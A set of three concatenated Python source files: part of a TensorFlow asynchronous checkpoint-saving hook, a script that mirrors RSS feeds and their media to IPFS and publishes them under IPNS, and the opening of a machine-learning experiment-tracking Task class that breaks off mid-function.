self._save_path = os.path.join(checkpoint_dir, checkpoint_basename)
self._scaffold = scaffold
self._timer = basic_session_run_hooks.SecondOrStepTimer(
every_secs=save_secs, every_steps=save_steps)
self._listeners = listeners or []
self._steps_per_run = 1
self._summary_writer = None
self._global_step_tensor = None
def _set_steps_per_run(self, steps_per_run):
self._steps_per_run = steps_per_run
def begin(self):
self._summary_writer = SummaryWriterCache.get(self._checkpoint_dir)
self._global_step_tensor = training_util._get_or_create_global_step_read() # pylint: disable=protected-access
if self._global_step_tensor is None:
raise RuntimeError(
"Global step should be created to use CheckpointSaverHook.")
for l in self._listeners:
l.begin()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
    # We write the graph and saver_def once, as soon as the session is created.
    # We cannot do this in begin, since we let other hooks change the graph and
    # add variables in begin. The graph is finalized after all begin calls.
training_util.write_graph(
ops.get_default_graph().as_graph_def(add_shapes=True),
self._checkpoint_dir, "graph.pbtxt")
saver_def = self._get_saver().saver_def if self._get_saver() else None
graph = ops.get_default_graph()
meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True), saver_def=saver_def)
self._summary_writer.add_graph(graph)
self._summary_writer.add_meta_graph(meta_graph_def)
# The checkpoint saved here is the state at step "global_step".
self._save(session, global_step)
self._timer.update_last_triggered_step(global_step)
def before_run(self, run_context): # pylint: disable=unused-argument
return SessionRunArgs(self._global_step_tensor)
def after_run(self, run_context, run_values):
stale_global_step = run_values.results
if self._timer.should_trigger_for_step(stale_global_step +
self._steps_per_run):
# get the real value after train op.
global_step = run_context.session.run(self._global_step_tensor)
if self._timer.should_trigger_for_step(global_step):
self._timer.update_last_triggered_step(global_step)
if self._save(run_context.session, global_step):
run_context.request_stop()
def end(self, session):
if self._save_thread:
logging.info("Waiting for any pending checkpoints to finish.")
self._save_thread.join()
last_step = session.run(self._global_step_tensor)
# Save the last checkpoint synchronously if needed.
if last_step != self._timer.last_triggered_step():
self._save(session, last_step, asynchronous=False)
for l in self._listeners:
l.end(session, last_step)
def _save(self, session, step, asynchronous=True):
"""Saves the latest checkpoint, returns should_stop."""
# Skip saving on step 0
if step == 0:
return
def _save_fn():
"""Run the saver process."""
logging.info("Saving checkpoints for %d into %s.", step, self._save_path)
start_time = time.time()
for l in self._listeners:
l.before_save(session, step)
self._get_saver().save(session, self._save_path, global_step=step)
self._summary_writer.add_session_log(
SessionLog(
status=SessionLog.CHECKPOINT, checkpoint_path=self._save_path),
step)
end_time = time.time()
logging.info("Checkpoint actual writing time: (%.3f sec)",
end_time - start_time)
logging.info("Checkpoint finished for %d into %s.", step, self._save_path)
      for l in self._listeners:
        l.after_save(session, step)
if not asynchronous:
_save_fn()
return
if self._save_thread is not None:
self._save_thread.join(timeout=0.1)
if self._save_thread.is_alive():
logging.info("Saver thread still in progress, skipping checkpoint.")
return
self._save_thread = threading.Thread(target=_save_fn)
self._save_thread.start()
def _get_saver(self):
if self._saver is not None:
return self._saver
elif self._scaffold is not None:
return self._scaffold.saver
# Get saver from the SAVERS collection if present.
collection_key = ops.GraphKeys.SAVERS
savers = ops.get_collection(collection_key)
if not savers:
raise RuntimeError(
"No items in collection {}. Please add a saver to the collection "
"or provide a saver or scaffold.".format(collection_key))
elif len(savers) > 1:
raise RuntimeError(
"More than one item in collection {}. "
"Please indicate which one to use by passing it to the constructor."
.format(collection_key))
self._saver = savers[0]
return savers[0]
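def _example_usage(model_fn, input_fn, model_dir):
  """Illustrative sketch (not part of the original module): wiring the hook
  into a TF 1.x Estimator. `model_fn` and `input_fn` are caller-supplied."""
  import tensorflow as tf  # assumes the TF 1.x estimator API is available
  hook = AsyncCheckpointSaverHook(model_dir, save_steps=1000)
  estimator = tf.estimator.Estimator(model_fn=model_fn, model_dir=model_dir)
  estimator.train(input_fn=input_fn, hooks=[hook], max_steps=10000)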
|
rss_feed.py
|
import feedparser
import os
import re
import requests
import subprocess
import sys
import time
from multiprocessing import Queue, Process
from multiprocessing.queues import Empty
from requests import head, get
from copy import deepcopy
from pprint import pformat
from logger import log
from downloader import download, safe_filename, construct_cache_file_name, \
is_cache_stale
from publisher import publish, get_public_gateways, publish_folder
from random import shuffle
from config import MAX_ERRORS, TEST_DOWNLOAD_TIMEOUT, FIRST_CHOICE_GATEWAYS, \
FALLBACK_LOCAL_GATEWAYS, STORAGE_DIR, TIME_TO_LIVE, \
LOG_LEVEL
from constants import HTTP_OK, HTTP_PARTIAL
public_gateways = get_public_gateways()
log.debug("public_gateways:%s" % pformat(public_gateways))
error_tracker = {}
reliablity_tracker = {}
def _req(url, queue, expected_hash):
a = get(url)
content = a.content.decode("utf-8")
log.debug("a.content:%s" % content)
if a.status_code == 200 and content == expected_hash:
log.debug("Matched expected_hash:%s" % expected_hash)
queue.put(a)
return
def get_first_hash(urls, expected_hash):
jobs = []
q = Queue()
for url in urls:
p = Process(target=_req, args=(url, q, expected_hash))
jobs.append(p)
for p in jobs:
p.start()
try:
ret = q.get(timeout=20) # blocking get - wait at most 20 seconds for a return
except Empty: # thrown if the timeout is exceeded
ret = None
for p in jobs:
p.terminate()
return ret
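# Illustrative usage (not part of the original module): race the same content
# hash across several gateway URLs and keep whichever response matches first.
# "QmExampleHash" below is a placeholder, not a real content hash.
#
#     urls = [u.replace(":hash", "QmExampleHash") for u in public_gateways]
#     response = get_first_hash(urls, expected_hash="QmExampleHash")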
class RssFeed:
rss_url = None
cache_file = None
final_file = None
rss_pub_key = None
rss_test_pub_key = None
def __init__(self, rss_url=None):
self.cache_file_downloaded = False
self.rss_url = rss_url
self.key = safe_filename(self.rss_url)
self.rss_folder = os.path.join(STORAGE_DIR, self.key)
self.ipns_file = os.path.join(STORAGE_DIR, "%s.pns" % self.key)
self.replacements = []
self.cache_file = construct_cache_file_name(
self.rss_url, subdir="%s.orig" % self.key)
self.text = ''
self.load_text()
self.feed = None
self.parent_hash = ""
self.ipns_hash = ""
if os.path.exists(self.ipns_file):
self.ipns_hash = open(self.ipns_file,'r').read()
# self.cache_file = download(self.rss_url, subdir="%s.orig" % self.key)
if not os.path.exists(self.rss_folder):
os.makedirs(self.rss_folder)
dirname = os.path.dirname(self.cache_file)
basename = os.path.basename(self.cache_file)
final_filename = "%s.final.xml" % basename
self.final_file = os.path.join(self.rss_folder, final_filename)
self.pub_key, self.test_pub_key = publish(self.cache_file)
log.debug("Initialized rss_url:%s" % rss_url)
def process(self):
self.process_feed()
if self.cache_file_downloaded:
self.process_image()
self.process_enclosures()
self.process_replacements()
self.write_final_file()
self.publish_ipns()
def process_feed(self):
self.cache_file_downloaded = False
if not os.path.exists(self.cache_file):
self.cache_file = download(self.rss_url, subdir="%s.orig" % self.key)
self.cache_file_downloaded = True
self.load_text()
log.info("parsing:%s" % self.cache_file)
self.feed = feedparser.parse(self.cache_file)
log.debug("feed:%s" % pformat(self.feed))
if self.cache_file_downloaded:
log.debug("cache file already downloaded")
return
ttl = TIME_TO_LIVE
log.debug("checking ttl:%s" % self.rss_url)
if 'ttl' in self.feed.feed:
log.debug("feed.ttl:%s" % self.feed.feed['ttl'])
try:
ttl_min = int(self.feed.feed['ttl'])
ttl = ttl_min * 60
            except (ValueError, TypeError):
                pass
if is_cache_stale(self.cache_file, TTL=ttl, refresh=True):
log.debug("cache is stale:%s" % self.rss_url)
self.cache_file = download(self.rss_url,
subdir="%s.orig" % self.key,
TTL=ttl)
self.cache_file_downloaded = True
self.load_text()
else:
log.debug("cache is not stale:%s" % self.rss_url)
self.load_text()
def load_text(self):
if os.path.exists(self.cache_file):
self.text = open(self.cache_file, 'r').read()
if not self.text:
log.error("cache_file `%s` is empty" % self.cache_file)
else:
log.error("cache_file `%s` is missing" % self.cache_file)
def process_image(self):
try:
log.debug("feed.feed.image:%s" % self.feed.feed.image)
self.image = self.feed.feed.image
subdir = safe_filename(self.rss_url)
self.image_cache_file = download(self.image.href, TTL=(60 * 60 * 24),
subdir=subdir)
if not self.image_cache_file:
return
dirname = os.path.dirname(self.image_cache_file)
basename = os.path.basename(self.image_cache_file)
folder_basename = os.path.basename(dirname)
pub_key, test_pub_key = publish(self.image_cache_file)
hashes = self.full_publish_folder(dirname)
parent_hash = ""
            for name, h in hashes:
                if name == folder_basename:
                    log.debug("--------------")
                    log.debug("hash:%s" % h)
                    log.debug("name:%s" % name)
                    parent_hash = deepcopy(h)
                    log.debug("--------------")
enclosure_replacement = os.path.join(parent_hash,
basename)
log.debug("parent_hash:%s" % parent_hash)
log.debug("basename:%s" % basename)
log.debug("image enclosure_replacement:%s" % enclosure_replacement)
            self.replacements.append((self.image.href, enclosure_replacement,
                                      pub_key, test_pub_key))
        except Exception as e:
            log.debug("process_image skipped: %s" % e)
def process_enclosures(self):
for entry in self.feed['entries']:
log.debug("entry:%s" % pformat(entry))
subdir = safe_filename(self.rss_url)
published_parsed = entry.get("published_parsed")
if published_parsed:
# 'published_parsed': time.struct_time(tm_year=2009, tm_mon=7, tm_mday=30, tm_hour=10, tm_min=52, tm_sec=31, tm_wday=3, tm_yday=211, tm_isdst=0),
pub_subdir = time.strftime("%Y/%m-%b/%Y-%m-%d %a", published_parsed)
subdir = os.path.join(subdir, pub_subdir)
for enclosure in entry['enclosures']:
log.debug("enclosure:%s" % enclosure)
enclosure_cache_file = download(enclosure.href, False,
subdir=subdir)
if not enclosure_cache_file:
continue
log.debug("enclosure_cache_file:%s" % enclosure_cache_file)
pub_key, test_pub_key = publish(enclosure_cache_file)
if not pub_key or not test_pub_key:
continue
dirname = os.path.dirname(enclosure_cache_file)
basename = os.path.basename(enclosure_cache_file)
folder_basename = os.path.basename(dirname)
hashes = self.full_publish_folder(dirname)
parent_hash = ""
                for name, h in hashes:
                    if name == folder_basename:
                        log.debug("--------------")
                        log.debug("hash:%s" % h)
                        log.debug("name:%s" % name)
                        parent_hash = deepcopy(h)
                        log.debug("--------------")
enclosure_replacement = os.path.join(parent_hash,
basename)
log.debug("parent_hash:%s" % parent_hash)
log.debug("basename:%s" % basename)
log.debug("enclosure_replacement:%s" % enclosure_replacement)
self.replacements.append((enclosure.href, enclosure_replacement,
pub_key, test_pub_key))
def max_errors_reached(self):
max_errors_reached_for_all = True
if not error_tracker:
return False
for url, count in error_tracker.items():
if count < MAX_ERRORS:
max_errors_reached_for_all = False
break
return max_errors_reached_for_all
def process_replacements(self):
for href, enclosure_replacement, pub_key, test_pub_key in self.replacements:
log.debug("href:`%s` enclosure_replacement:`%s` pub_key:`%s` test_pub_key:`%s`" % (
href, enclosure_replacement, pub_key, test_pub_key
))
errors = []
            if not href:
                errors.append("href null or empty")
if not enclosure_replacement:
errors.append("enclosure_replacement null or empty")
if not pub_key:
errors.append("pub_key null or empty")
if not test_pub_key:
errors.append("test_pub_key null or empty")
if errors:
log.error("Skipping:%s for: href:%s enclosure_replacement:%s "
"pub_key:%s test_pub_key:%s" % (
",".join(errors),
href,
enclosure_replacement,
pub_key,
test_pub_key))
continue
if self.max_errors_reached():
log.critical("Max errors as been reached for all urls %s" %
pformat(error_tracker))
return
while not self.max_errors_reached():
find = href
good_url = self.get_first_test_result(test_pub_key, pub_key)
if not good_url:
log.error("Unable to get a good url for test_pub_key:%s "
"pub_key:%s" % (test_pub_key, pub_key))
break
log.debug("******* MADE IT good_url:%s" % good_url)
hash_url = good_url.replace(test_pub_key, ":hash")
replace = good_url.replace(test_pub_key, enclosure_replacement)
log.debug("replace:%s" % replace)
if hash_url not in error_tracker:
error_tracker[hash_url] = 0
if hash_url not in reliablity_tracker:
reliablity_tracker[hash_url] = 0
if self.test_download(replace):
reliablity_tracker[hash_url] += 1
self.text = self.text.replace(find, replace)
break
error_tracker[hash_url] += 1
def test_download(self, url):
result = False
log.info("TESTING: %s" % url.replace(" ", "%20"))
if '/home/' in url:
log.error("/home/ is in url")
sys.exit()
TEST_RANGE = 256000
try:
headers = {
"Range": "bytes=0-%s" % TEST_RANGE
}
response = requests.get(url, stream=True,
timeout=TEST_DOWNLOAD_TIMEOUT,
headers=headers)
except requests.exceptions.ReadTimeout as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ChunkedEncodingError as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
if response.status_code not in (HTTP_OK, HTTP_PARTIAL):
log.debug("BAD URL:%s" % url)
log.info("TEST RESULT: %s" % result)
return result
total_length = response.headers.get('content-length')
done_float = 0
if total_length is None: # no content length header
# fp.write(response.content)
log.info("total_length was None")
content = ""
            try:
                rows, columns = subprocess.check_output(
                    ['stty', 'size']).decode().split()
                columns = int(columns)
            except Exception:  # stdout may not be attached to a terminal
                columns = 80
max_len = columns - (len("TEST 100.00%% dl:%s " % TEST_RANGE) + 4)
short_url = (url[:max_len] + '...') if len(url) > max_len else url
try:
dl = 0
for data in response.iter_content(chunk_size=1024 * 1):
dl += len(data)
done_float = float(100 * dl / TEST_RANGE)
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\rTEST %s %0.2f%% dl:%s" % (
short_url,
done_float,
dl
) )
sys.stdout.flush()
if dl >= TEST_RANGE:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
result = True
response.close()
return result
# content = response.content
log.info("len(content):%s" % len(content))
except requests.exceptions.ConnectionError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
return result
except requests.exceptions.ChunkedEncodingError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ReadTimeout as e:
log.debug("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
log.info("TEST RESULT: %s" % result)
return result
if not content:
log.error("No content BAD URL:%s" % url)
log.info("TEST RESULT: %s" % result)
return result
else:
result = True
else:
dl = 0
total_length = int(total_length)
log.debug("total_length:%s" % total_length)
try:
for data in response.iter_content(chunk_size=1024 * 1):
dl += len(data)
done_float = float(100 * dl / TEST_RANGE)
### CRITICAL 50
### ERROR 40
### WARNING 30
### INFO 20
### DEBUG 10
### NOTSET 0
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\rTEST %s %0.2f%% dl:%s" % (
url,
done_float,
dl
) )
sys.stdout.flush()
if response.status_code not in (HTTP_OK, HTTP_PARTIAL):
log.error("BAD URL:%s STATUS:%s" % (url, response.status_code))
response.close()
log.info("TEST RESULT: %s" % result)
return result
if dl >= TEST_RANGE:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
result = True
if dl > total_length:
result = False
log.error("BAD URL:%s %% too much" % url)
response.close()
break
else:
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
log.debug("GOOD URL:%s" % url)
response.close()
break
except requests.exceptions.ConnectionError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
except requests.exceptions.ChunkedEncodingError as e:
log.error("BAD URL:%s" % url)
log.error("Error reading %s" % url)
log.error("error.__doc__ %s" % e.__doc__)
if hasattr(e, 'message'):
log.error("error.message %s" % e.message)
response.close()
log.info("TEST RESULT: %s" % result)
return result
if LOG_LEVEL <= log.INFO:
sys.stdout.write("\n")
sys.stdout.flush()
log.info("TEST RESULT: %s" % result)
return result
def get_urls_to_process(self, urls, test_hash):
urls_to_process = []
for i, public_url in enumerate(urls):
if public_url not in error_tracker:
error_tracker[public_url] = 0
if error_tracker.get(public_url, 0) >= MAX_ERRORS:
log.debug("MAX_ERRORS reached for %s" % public_url)
continue
hash_url = public_url.replace(":hash", test_hash)
log.debug("opening:%s" % hash_url)
# requests[hash_url] = session.get(hash_url, background_callback=bg_cb)
urls[i] = hash_url
urls_to_process.append(hash_url)
shuffle(urls_to_process)
return urls_to_process
def get_first_test_result(self, test_hash, result_hash):
urls = deepcopy(public_gateways)
if FIRST_CHOICE_GATEWAYS:
for url in FIRST_CHOICE_GATEWAYS:
if url in urls:
urls.remove(url)
urls_to_process = self.get_urls_to_process(
FIRST_CHOICE_GATEWAYS, test_hash)
log.debug("FIRST_CHOICE_GATEWAYS:%s" % pformat(urls_to_process))
res = get_first_hash(urls_to_process, result_hash)
if res:
log.debug("res:%s" % pformat(res))
return res.url
urls_to_process = self.get_urls_to_process(urls, test_hash)
log.debug("urls_to_process:%s" % pformat(urls_to_process))
res = get_first_hash(urls_to_process, result_hash)
if res is None and FALLBACK_LOCAL_GATEWAYS:
urls_to_process = self.get_urls_to_process(FALLBACK_LOCAL_GATEWAYS, test_hash)
res = get_first_hash(urls_to_process, result_hash)
log.debug("res:%s" % pformat(res))
if not res:
return None
# log.debug("res dir() %s" % pformat(dir(res)))
return res.url
def write_final_file(self):
if self.text:
with open(self.final_file,'w') as fp:
fp.write(self.text)
if LOG_LEVEL < log.INFO:
print("== final file ==")
print(self.text)
else:
log.error("Final xml is empty")
log.debug("error_tracker:%s" % pformat(error_tracker))
log.debug("reliablity_tracker:%s" % pformat(reliablity_tracker))
def get_keys(self):
cmd = ["ipfs", "key", "list", "-l"]
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
keys = {}
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
line = line.rstrip()
_hash, name = line.split(" ", 1)
keys[name] = _hash
else:
break
return keys
def get_last_line_of_output(self, cmd):
log.debug("cmd:%s" % pformat(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
last_line = ""
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
last_line = line.rstrip()
log.debug("OUTPUT:%s" % last_line)
else:
break
return last_line
def full_publish_folder(self, folder):
if not folder:
return
cmd = [
'ipfs',
'add',
'-r',
folder
]
log.debug("cmd:%s" % pformat(cmd))
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
hashes = []
while True:
line = p.stdout.readline()
if line != b'':
line = line.decode("utf8")
m = re.match("added (Qm[0-9A-Za-z]{44}) (.*)", line)
if m:
parent_hash = m.group(1)
name = m.group(2)
hashes.append((name, parent_hash))
log.debug("OUTPUT:%s" % line)
else:
break
log.debug("hashes:%s" % pformat(hashes))
return hashes
def gen_key(self, key_name):
# ipfs key gen --type=rsa --size=2048 mykey
cmd = [
"ipfs",
"key",
"gen",
"--type=rsa",
"--size=2048",
key_name
]
last_line = self.get_last_line_of_output(cmd)
log.debug("gen_key last_line:%s" % last_line)
def publish_folder(self, folder):
if not folder or not os.path.exists(folder):
return '', ''
parent_hash = ""
folder_name = ""
cmd = [
'ipfs',
'add',
'-r',
folder
]
last_line = self.get_last_line_of_output(cmd)
m = re.match("added (Qm[0-9A-Za-z]{44}) (.*)", last_line)
if m:
parent_hash = m.group(1)
folder_name = m.group(2)
else:
log.error("Unable to match regex with:%s" % last_line)
log.debug("parent_hash:%s" % parent_hash)
return parent_hash, folder_name
def publish_rss_folder(self):
parent_hash, folder_name = self.publish_folder(self.rss_folder)
return parent_hash
def publish_ipns(self):
keys = self.get_keys()
if self.key not in keys:
self.gen_key(self.key)
self.parent_hash = self.publish_rss_folder()
if not self.parent_hash:
log.error("parent_hash empty or null. Unable to publish ipns")
return
self.ipns_hash = self.publish_ipns_name()
if not self.ipns_hash:
log.error("ipns_hash empty or null. ipns publish failed")
return
else:
with open(self.ipns_file, 'w') as fp:
fp.write(self.ipns_hash)
log.info("http://localhost:8080/ipns/%s" % self.ipns_hash)
def publish_ipns_name(self):
log.info("Publishing to ipns, this might take a while.")
cmd = [
"ipfs",
"name",
"publish",
"--key=%s" % self.key,
"%s" % self.parent_hash,
]
last_line = self.get_last_line_of_output(cmd)
ipns_hash = ""
m = re.match("Published to (Qm[0-9A-Za-z]{44}): /ipfs/(Qm[0-9A-Za-z]{44})",
last_line)
if m:
ipns_hash = m.group(1)
else:
log.error("Unable to match ipns regex with:%s" % last_line)
log.debug("ipns_hash:%s" % ipns_hash)
return ipns_hash
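if __name__ == '__main__':
    # Minimal driver sketch (not part of the original module): process a single
    # feed URL passed on the command line. Assumes a local IPFS daemon and the
    # config values imported above.
    if len(sys.argv) > 1:
        feed = RssFeed(rss_url=sys.argv[1])
        feed.process()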
|
task.py
|
""" Backend task management support """
import itertools
import json
import logging
import os
import re
import sys
import warnings
from copy import copy
from datetime import datetime
from enum import Enum
from multiprocessing import RLock
from operator import itemgetter
from tempfile import gettempdir
from threading import Thread
from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set
from uuid import uuid4
from pathlib2 import Path
try:
# noinspection PyCompatibility
from collections.abc import Iterable
except ImportError:
from collections import Iterable
import six
from six.moves.urllib.parse import quote
from ...utilities.locks import RLock as FileRLock
from ...utilities.proxy_object import verify_basic_type
from ...binding.artifacts import Artifacts
from ...backend_interface.task.development.worker import DevWorker
from ...backend_interface.session import SendError
from ...backend_api import Session
from ...backend_api.services import tasks, models, events, projects
from ...backend_api.session.defs import ENV_OFFLINE_MODE
from ...utilities.pyhocon import ConfigTree, ConfigFactory
from ...utilities.config import config_dict_to_text, text_to_config_dict
from ..base import IdObjectBase, InterfaceBase
from ..metrics import Metrics, Reporter
from ..model import Model
from ..setupuploadmixin import SetupUploadMixin
from ..util import (
make_message, get_or_create_project, get_single_result,
exact_match_regex, mutually_exclusive, )
from ...config import (
get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR,
running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, deferred_config, )
from ...debugging import get_logger
from ...storage.helper import StorageHelper, StorageError
from .access import AccessMixin
from .repo import ScriptInfo, pip_freeze
from .hyperparams import HyperParams
from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR, DOCKER_BASH_SETUP_ENV_VAR
from ...utilities.process.mp import SingletonLock
class Task(IdObjectBase, AccessMixin, SetupUploadMixin):
""" Task manager providing task object access and management. Includes read/write access to task-associated
frames and models.
"""
_anonymous_dataview_id = '__anonymous__'
_development_tag = 'development'
archived_tag = 'archived'
_default_configuration_section_name = 'General'
_legacy_parameters_section_name = 'Args'
_force_requirements = {}
_ignore_requirements = set()
_store_diff = deferred_config('development.store_uncommitted_code_diff', False)
_store_remote_diff = deferred_config('development.store_code_diff_from_remote', False)
_report_subprocess_enabled = deferred_config('development.report_use_subprocess', sys.platform == 'linux')
_force_use_pip_freeze = deferred_config(multi=[('development.detect_with_pip_freeze', False),
('development.detect_with_conda_freeze', False)])
_offline_filename = 'task.json'
class TaskTypes(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
training = 'training'
testing = 'testing'
inference = "inference"
data_processing = "data_processing"
application = "application"
monitor = "monitor"
controller = "controller"
optimizer = "optimizer"
service = "service"
qc = "qc"
custom = "custom"
class TaskStatusEnum(Enum):
def __str__(self):
return str(self.value)
def __eq__(self, other):
return str(self) == str(other)
created = "created"
queued = "queued"
in_progress = "in_progress"
stopped = "stopped"
published = "published"
publishing = "publishing"
closed = "closed"
failed = "failed"
completed = "completed"
unknown = "unknown"
class DeleteError(Exception):
pass
def __init__(self, session=None, task_id=None, log=None, project_name=None,
task_name=None, task_type=TaskTypes.training, log_to_backend=True,
raise_on_validation_errors=True, force_create=False):
"""
Create a new task instance.
:param session: Optional API Session instance. If not provided, a default session based on the system's
configuration will be used.
:type session: Session
:param task_id: Optional task ID. If not provided, a new task will be created using the API
and its information reflected in the resulting instance.
:type task_id: string
        :param log: Optional log to be used. If not provided, an internal log shared with all backend objects will be
used instead.
:type log: logging.Logger
:param project_name: Optional project name, minimum length of 3 characters, used only if a new task is created.
The new task will be associated with a project by this name. If no such project exists, a new project will
be created using the API.
:type project_name: str
:param task_name: Optional task name, minimum length of 3 characters, used only if a new task is created.
        :type task_name: str
:param task_type: Optional task type, used only if a new task is created. Default is training task.
:type task_type: str (see tasks.TaskTypeEnum)
:param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API.
This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND.
:type log_to_backend: bool
:param force_create: If True a new task will always be created (task_id, if provided, will be ignored)
:type force_create: bool
"""
SingletonLock.instantiate()
task_id = self._resolve_task_id(task_id, log=log) if not force_create else None
self.__edit_lock = None
super(Task, self).__init__(id=task_id, session=session, log=log)
self._project_name = None
self._storage_uri = None
self._metrics_manager = None
self.__reporter = None
self._curr_label_stats = {}
self._raise_on_validation_errors = raise_on_validation_errors
self._parameters_allowed_types = tuple(set(
six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None))
))
self._app_server = None
self._files_server = None
self._initial_iteration_offset = 0
self._reload_skip_flag = False
if not task_id:
# generate a new task
self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type)
if self._offline_mode:
self.data.id = self.id
self.name = task_name
else:
# this is an existing task, let's try to verify stuff
self._validate(check_output_dest_credentials=False)
if self.data is None:
raise ValueError("Task ID \"{}\" could not be found".format(self.id))
self._project_name = (self.project, project_name)
if running_remotely() or DevWorker.report_stdout:
log_to_backend = False
self._log_to_backend = get_log_to_backend(default=log_to_backend)
self._artifacts_manager = Artifacts(self)
self._hyper_params_manager = HyperParams(self)
def _validate(self, check_output_dest_credentials=False):
if not self._is_remote_main_task():
self._storage_uri = self.get_output_destination(raise_on_error=False, log_on_error=False) or None
return
raise_errors = self._raise_on_validation_errors
output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False)
if output_dest and check_output_dest_credentials:
try:
self.log.info('Validating output destination')
conf = get_config_for_bucket(base_url=output_dest)
if not conf:
msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest
self.log.warning(msg)
if raise_errors:
raise Exception(msg)
except StorageError:
raise
except Exception as ex:
self.log.error('Failed trying to verify output destination: %s' % ex)
@classmethod
def _resolve_task_id(cls, task_id, log=None):
if not task_id:
task_id = cls.normalize_id(get_remote_task_id())
if task_id:
log = log or get_logger('task')
log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id))
return task_id
def _update_repository(self):
def check_package_update():
# noinspection PyBroadException
try:
# check latest version
from ...utilities.check_updates import CheckPackageUpdates
latest_version = CheckPackageUpdates.check_new_package_available(only_once=True)
if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get(
default=config.get('development.suppress_update_message', False)):
if not latest_version[1]:
sep = os.linesep
self.get_logger().report_text(
'{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format(
Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])),
)
else:
self.get_logger().report_text(
'ClearML new version available: upgrade to v{} is recommended!'.format(
latest_version[0]),
)
except Exception:
pass
# get repository and create requirements.txt from code base
try:
check_package_update_thread = Thread(target=check_package_update)
check_package_update_thread.daemon = True
check_package_update_thread.start()
# do not request requirements, because it might be a long process, and we first want to update the git repo
result, script_requirements = ScriptInfo.get(
filepaths=[self._calling_filename, sys.argv[0], ]
if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ],
log=self.log, create_requirements=False,
check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff
)
for msg in result.warning_messages:
self.get_logger().report_text(msg)
# if the git diff is too large to store on the task, we must store it as an artifact:
if result.auxiliary_git_diff:
diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n"
diff_preview += '\n'.join(
line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git '))
self._artifacts_manager.upload_artifact(
name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff,
preview=diff_preview,
)
# store original entry point
entry_point = result.script.get('entry_point') if result.script else None
# check if we are running inside a module, then we should set our entry point
# to the module call including all argv's
result.script = ScriptInfo.detect_running_module(result.script)
# Since we might run asynchronously, don't use self.data (let someone else
# overwrite it before we have a chance to call edit)
with self._edit_lock:
self.reload()
self.data.script = result.script
self._edit(script=result.script)
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if result.script and script_requirements:
entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \
os.path.join(result.script['working_dir'], entry_point)
if self._force_use_pip_freeze:
if isinstance(self._force_use_pip_freeze, (str, Path)):
conda_requirements = ''
req_file = Path(self._force_use_pip_freeze)
requirements = req_file.read_text() if req_file.is_file() else None
else:
requirements, conda_requirements = pip_freeze(
combine_conda_with_pip=config.get('development.detect_with_conda_freeze', True))
requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\
+ requirements
else:
requirements, conda_requirements = script_requirements.get_requirements(
entry_point_filename=entry_point_filename)
if requirements:
if not result.script['requirements']:
result.script['requirements'] = {}
result.script['requirements']['pip'] = requirements
result.script['requirements']['conda'] = conda_requirements
self._update_requirements(result.script.get('requirements') or '')
# we do not want to wait for the check version thread,
# because someone might wait for us to finish the repo detection update
except SystemExit:
pass
except Exception as e:
get_logger('task').debug(str(e))
def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training):
created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s')
if isinstance(task_type, self.TaskTypes):
task_type = task_type.value
